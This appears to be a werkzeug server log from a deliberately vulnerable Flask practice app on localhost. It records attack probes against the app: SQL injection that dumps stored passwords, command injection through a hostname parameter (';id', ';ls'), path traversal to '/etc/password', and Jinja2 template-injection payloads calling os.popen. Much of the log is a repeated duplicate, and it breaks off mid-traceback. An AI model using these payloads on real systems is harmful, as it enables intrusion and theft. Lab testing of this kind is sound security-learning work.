DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:12] "GET /user/1=1 HTTP/1.1" 200 -
ERROR:vulnerable-flask-app:Exception on /user/1=1' [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 20, in search_user
    cur.execute("select * from test where username = '%s'" % name)
sqlite3.OperationalError: unrecognized token: "'1=1''"
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:33] "[35m[1mGET /user/1=1' HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /user/'1=1 [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 20, in search_user
    cur.execute("select * from test where username = '%s'" % name)
sqlite3.OperationalError: near "1": syntax error
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:54] "[35m[1mGET /user/'1=1 HTTP/1.1[0m" 500 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:09] "GET /user/2=2 HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:13] "[33mGET /user/ HTTP/1.1[0m" 404 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:15] "GET /user/1 HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:42] "GET /user/eric HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:49] "GET /user/erik HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:57] "GET /user/user=erik HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:08:41] "[33mGET /get_useres?hostname=google.cm;id HTTP/1.1[0m" 404 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:08:47] "[33mGET /get_useres?hostname=google.com;id HTTP/1.1[0m" 404 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:09:44] "[32mGET /get_log HTTP/1.1[0m" 308 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:09:44] "GET /get_log/ HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:10:53] "[33mGET /get_adminmail/admin HTTP/1.1[0m" 404 -
DEBUG:root:admin@cybersecurity.intra
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:11:01] "GET /get_admin_mail/admin HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        test
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:24] "GET /hello?name=test HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {7*7}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:36] "GET /hello?name={7*7} HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {7{*7}}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:51] "GET /hello?name={7{*7}} HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{7*7}}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:56] "GET /hello?name={{7*7}} HTTP/1.1" 200 -
DEBUG:root:[('test', 'test'), ('erlik', '$x&3de)GwWEIjyhpsA'), ('erlik', '12345'), ('erlik', 'f2Vbhj38qrS4018JDSKa'), ('test', '12345'), ('test', '$x&3de)GwWEIjyhpsA'), ('erlik', '66f2816ac6A!')]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:13:29] "GET /user/'%20or%20'%201=1 HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:14:21] "GET /get_users?hostname=google.coom;id HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:15:36] "GET /get_users?hostname=google.coom;ls HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:15:54] "GET /get_users?hostname=google.coom;tocuh%20test.txt HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:16:02] "GET /get_users?hostname=google.coom;tocuh%20test.txt HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:16:14] "GET /get_users?hostname=google.coom;ls%20../ HTTP/1.1" 200 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:19] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:33] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:40] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -
DEBUG:root:DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:12] "GET /user/1=1 HTTP/1.1" 200 -
ERROR:vulnerable-flask-app:Exception on /user/1=1' [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 20, in search_user
    cur.execute("select * from test where username = '%s'" % name)
sqlite3.OperationalError: unrecognized token: "'1=1''"
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:33] "[35m[1mGET /user/1=1' HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /user/'1=1 [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 20, in search_user
    cur.execute("select * from test where username = '%s'" % name)
sqlite3.OperationalError: near "1": syntax error
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:05:54] "[35m[1mGET /user/'1=1 HTTP/1.1[0m" 500 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:09] "GET /user/2=2 HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:13] "[33mGET /user/ HTTP/1.1[0m" 404 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:15] "GET /user/1 HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:42] "GET /user/eric HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:49] "GET /user/erik HTTP/1.1" 200 -
DEBUG:root:[]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:06:57] "GET /user/user=erik HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:08:41] "[33mGET /get_useres?hostname=google.cm;id HTTP/1.1[0m" 404 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:08:47] "[33mGET /get_useres?hostname=google.com;id HTTP/1.1[0m" 404 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:09:44] "[32mGET /get_log HTTP/1.1[0m" 308 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:09:44] "GET /get_log/ HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:10:53] "[33mGET /get_adminmail/admin HTTP/1.1[0m" 404 -
DEBUG:root:admin@cybersecurity.intra
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:11:01] "GET /get_admin_mail/admin HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        test
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:24] "GET /hello?name=test HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {7*7}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:36] "GET /hello?name={7*7} HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {7{*7}}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:51] "GET /hello?name={7{*7}} HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{7*7}}
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:12:56] "GET /hello?name={{7*7}} HTTP/1.1" 200 -
DEBUG:root:[('test', 'test'), ('erlik', '$x&3de)GwWEIjyhpsA'), ('erlik', '12345'), ('erlik', 'f2Vbhj38qrS4018JDSKa'), ('test', '12345'), ('test', '$x&3de)GwWEIjyhpsA'), ('erlik', '66f2816ac6A!')]
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:13:29] "GET /user/'%20or%20'%201=1 HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:14:21] "GET /get_users?hostname=google.coom;id HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:15:36] "GET /get_users?hostname=google.coom;ls HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:15:54] "GET /get_users?hostname=google.coom;tocuh%20test.txt HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:16:02] "GET /get_users?hostname=google.coom;tocuh%20test.txt HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:16:14] "GET /get_users?hostname=google.coom;ls%20../ HTTP/1.1" 200 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:19] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:33] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -
ERROR:vulnerable-flask-app:Exception on /read_file [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 77, in read_file
    file = open(filename, "r")
           ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/etc/password'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:22:40] "[35m[1mGET /read_file?filename=/etc/password HTTP/1.1[0m" 500 -

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:23:07] "GET /read_file?filename=restapi.log HTTP/1.1" 200 -
DEBUG:root:Unity of Command
Rule the Waves III
Flashpoint Campaigns: Southern Storm


INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:23:59] "GET /read_file?filename=/home/jeff/Documents/games.txt HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:36:18] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:38:35] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 13:38:40] "GET / HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config.__class__.init__.__globals__['os'].popen('|s').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 466, in getitem
    return obj[argument]
           ~~~^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'types.GenericAlias object' has no attribute '__globals__'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:11:08] "[35m[1mGET /hello?name={{config.__class__.init__.__globals__['os'].popen('|s').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config.__class__.init__.__globals__['os'].popen('ls').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 466, in getitem
    return obj[argument]
           ~~~^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'types.GenericAlias object' has no attribute '__globals__'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:12:09] "[35m[1mGET /hello?name={{config.__class__.init__.__globals__['os'].popen('ls').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config.__class__.init__.__globals__['os'].popen('is').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 466, in getitem
    return obj[argument]
           ~~~^^^^^^^^^^
